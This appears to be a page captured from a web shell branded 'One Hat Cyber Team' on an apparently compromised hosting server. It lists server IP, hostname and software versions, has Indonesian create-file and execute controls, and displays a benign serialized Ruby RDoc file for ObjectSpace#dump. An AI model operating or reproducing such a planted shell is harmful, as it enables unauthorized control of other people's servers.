⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.133
Server IP:
185.119.109.197
Server:
Linux managedhosting.chostar.me 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
ri
/
3.0.0
/
system
/
ObjectSpace
/
View File Name :
dump-i.ri
U:RDoc::AnyMethod[iI" dump:ETI"ObjectSpace#dump;TF:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"0Dump the contents of a ruby object as JSON.;To:RDoc::Markup::BlankLine o; ; [ I"7This method is only expected to work with C Ruby. ;TI">This is an experimental method and is subject to change. ;TI"AIn particular, the function signature and output format are ;TI"@not guaranteed to be compatible in future versions of ruby.;T: @fileI"!ext/objspace/lib/objspace.rb;T:0@omit_headings_from_table_of_contents_below0I"ČObjectSpace.dump(obj[, output: :string]) # => "{ ... }" ObjectSpace.dump(obj, output: :file) # => #
ObjectSpace.dump(obj, output: :stdout) # => nil ;T0[ I"(obj, output: :string);T@FI"ObjectSpace;TcRDoc::NormalModule00